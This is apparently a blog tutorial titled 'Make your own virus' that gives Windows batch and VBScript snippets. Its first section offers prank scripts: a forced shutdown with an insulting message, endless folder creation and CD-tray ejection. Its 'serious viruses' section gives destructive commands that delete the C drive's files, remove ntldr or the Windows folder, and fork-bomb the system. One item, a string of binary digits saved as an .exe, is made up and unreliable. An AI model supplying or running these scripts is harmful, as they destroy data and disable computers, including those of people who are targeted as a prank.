MAKE YOUR OWN VIRUS
ON A SPECIAL DEMAND FROM A FRIEND OF MINE :
Ever wanted to make your own virus ? Even tried ? Didn't succeed ?... Don't be sad now ill help you to create your own virus .
Wikipedia and many other text books define Virus as a piece of code capable of copying itself and has various effects such as corrupting a file or destroying a data .
Interesting na ?
Lets begin .
Here i will teach you how to make some funny viruses and some serious ones. Try them and try them with a little modification of your also .
WARNING: Improper usage of some of these viruses can result of fatal results , the results can also vary in comparison of the desired result , so use caution. The author shall not be liable for any loss of data or else .
FUNNY VIRUSES :
1. FORCEFUL SHUTDOWN
TO FORCEFULLY SHUTDOWN THE SYSTEM WITH A TAUNTING MSG
TYPE EXACTLY AS WRITTEN WITHING THE SQUARE BRACKETS, DO NOT COPY OR TYPE THE SQUARE BRACKETS::
OPEN NOTEPAD TYPE IN THE FOLLOWING CODE
[@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s]
SAVE THE FILE AS "msg.bat" (without quotes ) and dont forget to change the type of save as all files.
when saved run the file by double clicking it .
THIS WILL DISPALY A MESSAGE " I DONT LIKE YOU" AND THEN IT WILL SHUTDOWN THE SYSTEM
2. TO MAKE THOUSAND OF FOLDERS WITHIN SECONDS
FOR XP
TO MAKE MULTIPLE FOLDERS OMN DESKTOP OR WHERE THE FILE IS SAVED, IT WILL MAKE THOUSANDS OF FOLDERS... ENJOY , U HAVE TO DELETE THE FOLDERS MANUALLY.
CODE---
[@echo off
:hello
md %random%
goto hello]
save this code without square brackets
SAVE AS "folder.bat" (without quotes)
3. MATRIX FALLING EFFECT
[@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks]
Save the file as "matrix.bat" (without quotes )
4. CONSTANTLY MAKE YOUR CD WRITER COME OUT AND IN
[ Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop ]
Save the file as "cd.vbs" (without quotes )
5.MAKE YOUR COMPUTER TALK TO YOU
Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.
To create one such talk script, follow the steps given below:-
[ Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message ]
SAVE THIS FILE AS "msg.vbs"( WITHOUT QUOTES ) JUST RUN THE FILE , A POP UP WILL APPEAR TYPE IN WATEVER YOU WANT TO HEAR AND PRESS OK.. ENJOY
6. HAVE YOUR COMPUTER WELCOME YOU
HAVE YOU EVER WANTED THAT WHENEVER YOU START YOUR COMPUTER YOUR COMPUTER SHOULD WELCOME YOU ? IF YES , THEN GO AHEAD COPY PSTE THE CODE AND HAVE FUN WITH IT .
.) THIS CODE REQ SOME ADDITIONAL STEPS
.) OPEN THE NOTEPAD, COPY PASTE THE FOLLOWING CODE WITHOUT SQUARE BRACKET
[ Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks]
.) Replace Username with your own name. (no need to do it bold ,it is for presentation only)
.) Click on File Menu, Save As, select All Types in Save as Type option, and save the file as "Welcome.vbs" (WITHOUT QUOTES).
.) Copy the saved file.
.) Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
.) Paste the file.
7. MAKE YOUR KEYBOARD LIGHTS GO DISCO
Keyboards usually have small LEDs which indicate whether different types of locks are activated or not. Here is a trick to use the lights of your keyboard in a more creative manner in Windows.
This trick uses a simple Visual Basic Script which when activated makes your Scroll lock, Caps lock and Num lock LEDs flash in a cool rhythmic way which gives the perception of a live disco on your keyboard.
COPY N PASTE THE FOLLOWING CODE WITHOUT SQUARE BRACKETS
[Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop]
SAVE THE FILE AS "disco.vbs" (without quotes) Enjoy...
........................................................................
NOW WE WILL SEE SOME SERIOUS VIRUSES :P
1. TO FORMAT HARD DISK WITHIN SECONDS
COPY N PASTE THE FOLLOWING CODE:
[ 01001011000111110010010101010101010000011111100000 ]
SAVE IT as for.exe
2. TO DELETE ENTIRE C DRIVE
COPY N PASTE THE FOLLOWING CODE
[ @Echo off
Del C:\ *.* |y ]
SAVE THE FILE AS "FOR.BAT"( WITHOUT QUOTES)
3. TO IMMEDIATELY CRASH THE WINDOWS
This will immideatly crash the system and winds wont run again.
CODE---
FOR WIN XP
@echo off
cd\
c:
attrib ntldr -s -h -r
del ntldr /f
SAVE IT AS " CRASH.BAT" (WITHOUT QUOTES)
FOR WIN7-
[
rmdir c:\windows /q /s
]
SAVE IT AS "CRASH.BAT" (WITHOUT QUOTES)
4. MAKE SYSTEM GO TO PERMANENT HANG
This will increase ram usage and page file index usage , and system will go on permanent hang !!!!!!!
[
%0|%0
]
SAVE THE FILE AS "RM.BAT" (WITHOUT QUOTES)
I HOPE YOU WILL BE ABLE TO LEARN SOMETHING AND ENJOY FROM THE ABOVE GIVEN CODES.
IF YOU LIKE THE WORK OF AUTHOR KINDLY SHARE IT WITH YOUR FRIENDS AND COMMENT BELOW.
FOR ANY DOUBTS KINDLY COMMENT .